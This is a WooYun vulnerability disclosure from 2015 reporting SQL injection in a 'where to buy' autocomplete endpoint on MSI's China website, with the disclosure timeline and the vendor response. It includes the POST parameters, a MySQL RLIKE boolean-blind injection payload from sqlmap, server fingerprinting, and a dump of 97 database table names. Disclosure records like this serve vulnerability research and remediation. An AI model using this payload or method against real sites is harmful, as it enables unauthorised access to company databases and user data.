当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153086

漏洞标题:微星中国官网某处SQL注入漏洞

相关厂商:微星

漏洞作者: 染血の雪

提交时间:2015-11-11 09:32

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-11: 细节已通知厂商并且等待厂商处理中
2015-11-23: 厂商已经确认,细节仅向厂商公开
2015-12-03: 细节向核心白帽子及相关领域专家公开
2015-12-13: 细节向普通白帽子公开
2015-12-23: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

双11基友要买笔记本,问我什么牌子好。

详细说明:

url:

http://**.**.**.**/wheretobuy/autocomplete


post:

country_id=135791&city_id=135791&category_id=135791


payload:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: country_id=135791&city_id=135791&category_id=135791' RLIKE (SELECT (CASE WHEN (1079=1079) THEN 135791 ELSE 0x28 END)) AND 'beRI'='beRI
---
[INFO] the back-end DBMS is MySQL
web server operating system: Windows NT 4.0
web application technology: PHP 5.4.16
back-end DBMS: MySQL 5


漏洞证明:

`_T5@$XP{@@GZ2{]W1CC1`D.png


07_(JC[Z24$PU6XFET@}7IW.png


Database: cms_online
[97 tables]
+--------------------------+
| cms_banner |
| cms_bannerarea |
| cms_bannertype |
| cms_category |
| cms_chat |
| cms_country |
| cms_data |
| cms_download |
| cms_download_tmp |
| cms_downloadlanguage |
| cms_downloados |
| cms_downloadtype |
| cms_faq |
| cms_faq_file |
| cms_faq_file_ims |
| cms_faq_file_local |
| cms_faq_ims |
| cms_faq_local |
| cms_faq_log |
| cms_faq_product |
| cms_faq_product_ims |
| cms_faq_product_local |
| cms_faqtype |
| cms_faqtype_ims |
| cms_faqtype_local |
| cms_feature |
| cms_featuregroup |
| cms_function |
| cms_gacode |
| cms_group |
| cms_icon |
| cms_inquiry |
| cms_issue |
| cms_issuelabel |
| cms_localization |
| cms_log |
| cms_mail_user |
| cms_mb_old_cpu |
| cms_mb_old_cpu_bios |
| cms_mb_old_cpu_bom |
| cms_mb_old_cpu_product |
| cms_mb_support_bios |
| cms_mb_support_bom |
| cms_mb_support_category |
| cms_mb_support_cpu |
| cms_mb_support_hdd |
| cms_mb_support_mb |
| cms_mb_support_memory |
| cms_mb_support_oc_memory |
| cms_mb_support_report |
| cms_mb_support_vga |
| cms_menu |
| cms_menu_area |
| cms_menu_item |
| cms_message |
| cms_news |
| cms_newstype |
| cms_old_tag |
| cms_operation_log |
| cms_product |
| cms_product_category |
| cms_product_download |
| cms_product_feature |
| cms_product_icon |
| cms_product_news |
| cms_product_slogan |
| cms_product_tag |
| cms_productbanner |
| cms_productdescription |
| cms_productpicture |
| cms_productsort |
| cms_productvideo |
| cms_publish |
| cms_queue |
| cms_section |
| cms_seo |
| cms_seo_location |
| cms_sku |
| cms_skucolumn |
| cms_skudata |
| cms_skupicture |
| cms_slogan |
| cms_specification |
| cms_specificationcolumn |
| cms_staticpage |
| cms_support |
| cms_support_item |
| cms_synchronize |
| cms_tag |
| cms_template |
| cms_testreport |
| cms_testreport_product |
| cms_type |
| cms_user |
| cms_user_message |
| cms_wattage |
| cms_wheretobuy |
+--------------------------+


修复方案:

只要不忽略方法总是有的。

版权声明:转载请注明来源 染血の雪@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-11-23 11:35

厂商回复:

CNVD未复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无


漏洞评价:

评价